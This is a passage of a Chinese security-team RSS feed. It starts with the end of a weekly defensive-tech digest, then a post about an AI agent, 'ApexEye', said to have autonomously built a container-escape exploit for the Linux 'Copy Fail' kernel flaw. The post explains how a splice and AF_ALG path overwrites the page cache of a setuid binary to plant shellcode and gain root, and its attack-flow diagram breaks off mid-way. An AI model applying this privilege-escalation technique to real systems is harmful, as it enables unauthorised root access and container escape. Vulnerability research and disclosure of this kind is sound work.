0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">其他</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Sentinel Assessment Tool：PowerShell模块生成检测覆盖率HTML报告</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://medium.com/@rohitashokgowd/seven-queries-to-audit-the-sentinel-detections-your-soc-may-have-missed-8e9c73fc2522" target="_blank">https://medium.com/@rohitashokgowd/seven-queries-to-audit-the-sentinel-detections-your-soc-may-have-missed-8e9c73fc2522</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">cooldowns.dev：通过设置依赖安装冷却期降低供应链投毒风险</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://cooldowns.dev/" target="_blank">https://cooldowns.dev/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">RSigma工具集实现YAML规则解析为AST，编译优化匹配器，实时评估JSON日志事件</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://mostafa.dev/pattern-detection-and-correlation-in-json-logs-fab16334e4ee" target="_blank">https://mostafa.dev/pattern-detection-and-correlation-in-json-logs-fab16334e4ee</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">提出检测管道成熟度模型，高级阶段包含原子高保真检测和基于风险的自定义规则，领先阶段加入数据科学支持的异常检测和蜜标等欺骗技术</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://detect.fyi/detection-pipeline-maturity-model-076984779651" target="_blank">https://detect.fyi/detection-pipeline-maturity-model-076984779651</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="jpeg" data-w="344" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011372" src="https://wechat2rss.xlab.app/img-proxy/?k=de10efa5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FuZT6kWW1jCmmsvdREWte2y5ehk1HNnBAsLhacO44ia9vdYxyZ8QQTAdDP7zwVDTB29hKW1WcS5w1NNvdhyJjkdIyiaZiaUSvzjFIQMJWRs6Jc8%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">M01N Team公众号</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">聚焦高级攻防对抗热点技术</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">绿盟科技蓝军技术研究战队</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9145907473309609" data-s="300,640" data-type="png" data-w="562" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011370" src="https://wechat2rss.xlab.app/img-proxy/?k=0c6e447e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCmqMox13vibTbTlzSibibZ9APqic6lwUbrsVLUDicciclxpibZWUKznb3PpTiaKyh0Kg76hRibWPTjH4tBibnbEMSh56EiavSicGibTZJ9gN5rM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方攻防交流群</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">网络安全一手资讯</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻防技术答疑解惑</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">扫码加好友即可拉群</span></p></div></div></div></div><div style="margin: 10px 0% 0px;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;background-color: rgb(67, 146, 117);min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;padding: 10px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;text-align: center;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);font-size: 17px;padding: 0px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">往期推荐</span></b></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247495007&amp;idx=1&amp;sn=498f79f86d05ce3ce50d17af257ded42&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.4.18-5.1）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.4.18-5.1）</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494984&amp;idx=1&amp;sn=ea46bd4807fef8f239f9ccf214502a09&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.4.11-4.17）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.4.11-4.17）</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494935&amp;idx=1&amp;sn=2087d14d42eb91ff972139ef7fefc5d5&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.4.4-2026.4.10）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.4.4-2026.4.10）</a></span></p></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=f37a2d0a&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzkyMTI0NjA3OA%3D%3D%26mid%3D2247495022%26idx%3D1%26sn%3Ddb735c6a19342e06024737d374d7d171">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 08 May 2026 18:00:00 +0800</pubDate>
    </item>
    <item>
      <title>5分钟原理分析，20分钟容器逃逸：ApexEye漏洞研究智能体自主攻破&#34;Copy Fail&#34;内核通杀漏洞</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247495017&amp;idx=1&amp;sn=21e245531ce13c5507dd18dc05bd3663</link>
      <description>当全球安全社区还在分析Copy Fail漏洞（CVE-2026-31431）的本地提权PoC时，绿盟科技漏洞研究智能体ApexEye，已在不依赖任何容器逃逸细节或公开PoC的情况下，自主完成了从原理分析到容器逃逸攻击链的完整构建。</description>
      <content:encoded><![CDATA[<p>原创 <span>Moby.AI@M01N</span> <span>2026-05-02 12:40</span> <span style="display: inline-block;">陕西</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=7e90c1d7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FuZT6kWW1jCmvq7Rtc0zuXY5bwLSVNTlDkAx5r8jPA3qATJFGMW8IcbL1buyoNCPKbLRh9dLOHia3Q8Xpc7AsicUf0e5ezAbj9YGP4aaZcc0X8%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>当全球安全社区还在分析Copy Fail漏洞（CVE-2026-31431）的本地提权PoC时，绿盟科技漏洞研究智能体ApexEye，已在不依赖任何容器逃逸细节或公开PoC的情况下，自主完成了从原理分析到容器逃逸攻击链的完整构建。</p>
  <div style="font-size: 16px;"><div style="letter-spacing: normal;text-align: start;white-space: normal;"><div data-tools="135编辑器" data-id="88767" style="letter-spacing: normal;text-align: start;white-space: normal;"><div style="margin-top: 10px;margin-bottom: 10px;"><div style="padding-bottom: 1.2em;"><p style="caret-color: rgb(0, 0, 0);color: rgb(0, 0, 0);display: inline-block;vertical-align: top;line-height: 1em;height: 1em;margin-top: -0.5em;"><span style="display: inline-block;vertical-align: top;font-size: 80px;line-height: 1em;color: rgb(0, 144, 141);"><span leaf=""><span textstyle="" style="color: rgb(71, 138, 57);">“</span></span></span></p><div style="margin-top: -0.5em;padding: 10px 2em;"><p style="caret-color: rgb(0, 0, 0);color: rgb(0, 0, 0);"><span style="font-size: 15px;"><strong><span leaf=""><span textstyle="" style="color: rgb(31, 43, 57);font-weight: normal;">当全球安全社区还在分析Copy Fail漏洞（CVE-2026-31431）的本地提权PoC时，我们的</span><span textstyle="" style="color: rgb(31, 43, 57);font-weight: bold;">漏洞研究智能体ApexEye</span><span textstyle="" style="color: rgb(31, 43, 57);font-weight: normal;">，已在不依赖任何容器逃逸细节或公开PoC的情况下，自主完成了从原理分析到容器逃逸攻击链的完整构建。ApexEye漏洞研究智能体在5分钟内复现并验证了提权过程，在20分钟内从漏洞机理推导出云原生场景下的攻击路径，并生成可用exp。这一结果，展示了AI在当前漏洞研究能力上的实质性进阶。</span></span></strong></span></p></div><p style="caret-color: rgb(0, 0, 0);color: rgb(0, 0, 0);display: inline-block;height: 1em;float: right;line-height: 1;"><span style="display: inline-block;vertical-align: top;font-size: 80px;margin-top: -0.11em;margin-left: -0.1em;color: rgb(0, 144, 141);"><span leaf=""><span textstyle="" style="color: rgb(71, 138, 57);">”</span></span></span></p></div></div></div><h3 data-sourcepos="6:1-6:63" style="font-style: normal;font-variant-caps: normal;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;white-space: normal;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;box-sizing: border-box;margin-top: 1.5rem;margin-bottom: 1rem;font-weight: 600;line-height: 1.25;font-size: 1.25rem;color: rgb(102, 204, 204);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;" data-pm-slice="0 0 []"><span leaf=""><span textstyle="" style="font-size: 18px;color: rgb(42, 55, 72);">一场&#34;静默的地震&#34;：Copy Fail漏洞的颠覆性威胁</span></span></h3><p data-sourcepos="7:1-8:132" style="caret-color: rgb(204, 204, 204);color: rgb(204, 204, 204);font-size: 16px;letter-spacing: normal;text-align: justify;white-space: normal;margin: 0px;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;"><span leaf="" style="color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;">2026年4月29日，国际安全研究团队Theori公开了一个被命名为Copy Fail（CVE-2026-31431）的Linux内核高危漏洞 。这个仅有732字节的Python脚本，竟能通杀2017年以来几乎所有主流Linux发行版——Ubuntu、RHEL、Amazon Linux、SUSE无一幸免 。</span><span leaf=""><br/></span><span leaf="" style="color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;">与传统内核漏洞不同，Copy Fail不是内存损坏型漏洞，而是一个直线逻辑错误：</span></p><ul style="font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: auto;text-align: start;text-indent: 0px;text-transform: none;white-space: normal;widows: auto;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;box-sizing: border-box;padding-left: 2rem;margin-top: 0px;margin-bottom: 1rem;caret-color: rgb(204, 204, 204);color: rgb(204, 204, 204);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;" class="list-paddingleft-1"><li style="font-size:15px;"><p style="caret-color: rgb(204, 204, 204);color: rgb(204, 204, 204);font-size: 16px;letter-spacing: normal;text-align: justify;white-space: normal;margin: 0px;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;"><span leaf="" style="color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;"><span textstyle="" style="font-size: 15px;font-weight: bold;">无需竞争条件：</span><span textstyle="" style="font-size: 15px;">不像Dirty Cow需要&#34;碰运气&#34;的竞态利用，Copy Fail一次执行即可100%成功</span></span></p></li><li style="font-size:15px;"><p style="caret-color: rgb(204, 204, 204);color: rgb(204, 204, 204);font-size: 16px;letter-spacing: normal;text-align: justify;white-space: normal;margin: 0px;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;"><span leaf="" style="color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;"><span textstyle="" style="font-size: 15px;font-weight: bold;">无需内核偏移：</span><span textstyle="" style="font-size: 15px;">同一个脚本通杀所有发行版，无需针对特定内核版本调整</span></span></p></li><li style="box-sizing:border-box;margin-top:0.25rem;font-size:15px;"><p><span leaf="" style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;"><span textstyle="" style="font-size: 15px;font-weight: bold;">极度隐蔽：</span><span textstyle="" style="font-size: 15px;">篡改的是内存中的页缓存（Page Cache），磁盘文件本身未被修改，传统文件完整性检测无法发现</span></span></p></li></ul><p style="caret-color: rgb(204, 204, 204);color: rgb(204, 204, 204);font-size: 16px;letter-spacing: normal;text-align: justify;white-space: normal;margin: 0px;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;"><span leaf="" style="color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;">漏洞</span><span leaf="" style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;">的根源是</span><span leaf="" style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;">三个看似无害的内核改动在十年间的叠加：2011年引入的authencesn加密模板、2015年的AEAD接口转换，以及2017年致命的原地（In-Place）优化——正是这次优化让splice()零拷贝传</span><span leaf="" style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;">入的页缓存页</span><span leaf="" style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;">面进入了可写</span><span leaf="" style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;">的输出scatterlist，使得4字节的越界写入成为可能 。</span></p><p style="caret-color: rgb(204, 204, 204);color: rgb(204, 204, 204);font-size: 16px;letter-spacing: normal;text-align: justify;white-space: normal;margin: 0px;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;"><span leaf="" style="color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;"><span textstyle="" style="font-weight: bold;">Ubuntu官方已确认该漏洞在容器部署中可导致容器逃逸场景，但强调&#34;容器逃逸的PoC尚未公开&#34; 。这正是我们智能体突破的价值所在。</span></span></p><h3 data-sourcepos="15:1-15:20" style="font-style: normal;font-variant-caps: normal;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;white-space: normal;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;box-sizing: border-box;margin-top: 1.5rem;margin-bottom: 1rem;font-weight: 600;line-height: 1.25;font-size: 1.25rem;color: rgb(102, 204, 204);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;" data-pm-slice="0 0 []"><span leaf=""><span textstyle="" style="font-size: 18px;color: rgb(42, 55, 72);font-weight: bold;">漏洞本质</span></span></h3><p data-sourcepos="17:1-17:370" style="caret-color: rgb(204, 204, 204);color: rgb(204, 204, 204);font-size: 16px;letter-spacing: normal;text-align: justify;white-space: normal;margin: 0px;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;"><span leaf="" style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;">该漏洞允许本地低权限攻击者通过AF_ALG加密接口，</span><strong><span leaf="" style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;"><span textstyle="" style="color: rgb(37, 99, 58);">向任意可读文件的页缓存（page cache）写入受控的 4 字节数据</span></span></strong><span leaf="" style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;">。通过篡改 setuid 二进制文件（如 </span><code><span leaf="" style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;">/usr/bin/su</span></code><span leaf="" style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;">）的 page cache，攻击者可在无需任何系统调用错误返回的情况下，将注入的 shellcode 植入 page cache，执行后获得 root 权限。</span></p><pre data-sourcepos="21:1-36:3" tabindex="0" style="white-space:pre-wrap;box-sizing: border-box;font-family: Consolas, Monaco, &#34;Andale Mono&#34;, &#34;Ubuntu Mono&#34;, monospace;font-size: 13.6px;margin: 0.5rem 0px;overflow-wrap: normal;padding: 1rem;overflow: auto;line-height: 1.45;background: rgb(247, 248, 248);border-radius: 0.1875rem;color: black;text-align: left;word-spacing: normal;word-break: normal;tab-size: 4;hyphens: none;"><code style="white-space:pre-wrap;box-sizing: border-box;font-family: Consolas, Monaco, &#34;Andale Mono&#34;, &#34;Ubuntu Mono&#34;, monospace;font-size: 13.6px;padding: 0px;margin: 0px;background-color: initial;color: rgb(9, 132, 79);border-radius: 0.1875rem;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;text-align: left;word-spacing: normal;word-break: normal;overflow-wrap: normal;tab-size: 4;hyphens: none;border: 0px;display: inline;overflow: visible;line-height: inherit;"><span leaf=""><span textstyle="" style="font-size: 12px;">用户态（低权限）</span></span><span leaf=""><br/></span><span leaf=""><span textstyle="" style="font-size: 12px;">  │</span></span><span leaf=""><br/></span><span leaf=""><span textstyle="" style="font-size: 12px;">  ├─ splice() 将目标文件（如 /usr/bin/su）→ pipe → page cache 页引用</span></span><span leaf=""><br/></span><span leaf=""><span textstyle="" style="font-size: 12px;">  │     （无需写权限，仅读权限）</span></span><span leaf=""><br/></span><span leaf=""><span textstyle="" style="font-size: 12px;">  │</span></span><span leaf=""><br/></span><span leaf=""><span textstyle="" style="font-size: 12px;">  ├─ sendmsg(MSG_SPLICE_PAGES) → AF_ALG socket → TX SGL</span></span><span leaf=""><br/></span><span leaf=""><span textstyle="" style="font-size: 12px;">  │     （page cache 页被放入 crypto scatterlist）</span></span><span leaf=""><br/></span><span 